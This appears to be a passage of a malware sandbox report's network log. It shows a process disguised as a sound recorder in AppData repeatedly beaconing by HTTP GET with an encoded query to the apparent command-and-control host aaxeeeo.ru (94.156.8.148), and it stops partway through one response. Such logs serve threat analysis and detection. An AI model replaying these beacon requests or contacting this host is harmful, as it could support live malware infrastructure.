                                                                                    Jun 11, 2024 19:43:25.852226019 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:26.306878090 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:26.414768934 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:26.887772083 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.55264194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:27.013922930 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:28.152061939 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.55264294.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:28.279553890 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:29.493206978 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:29.603329897 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:30.157504082 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.55264394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:30.304614067 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:31.524456024 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:31.633411884 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:32.155364990 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.55264494.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:32.279654026 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:33.444287062 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:33.555269957 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:34.038939953 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:34.149022102 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:34.623289108 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    24 | 192.168.2.5 | 52645 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:34.748394012 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:35.887119055 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    25 | 192.168.2.5 | 52646 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:36.034207106 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:37.149792910 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    26 | 192.168.2.5 | 52647 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:37.280009985 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:38.431476116 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    27 | 192.168.2.5 | 52648 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:38.697972059 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:39.895795107 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    28 | 192.168.2.5 | 52649 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:40.013828039 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:41.235439062 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    29 | 192.168.2.5 | 52650 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:41.371967077 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:42.636065960 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    30 | 192.168.2.5 | 52651 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:42.763269901 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:43.944870949 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    31 | 192.168.2.5 | 52652 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:44.076577902 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:45.210340977 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:45.320897102 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:45.771339893 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    32 | 192.168.2.5 | 52653 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:45.889379025 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:46.944864035 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:47.055363894 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:47.475006104 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:47.586565971 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:48.005105972 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    33 | 192.168.2.5 | 52654 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:48.123286963 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:49.296906948 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    34 | 192.168.2.5 | 52655 | 94.156.8.148 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:49.420214891 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:50.627034903 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
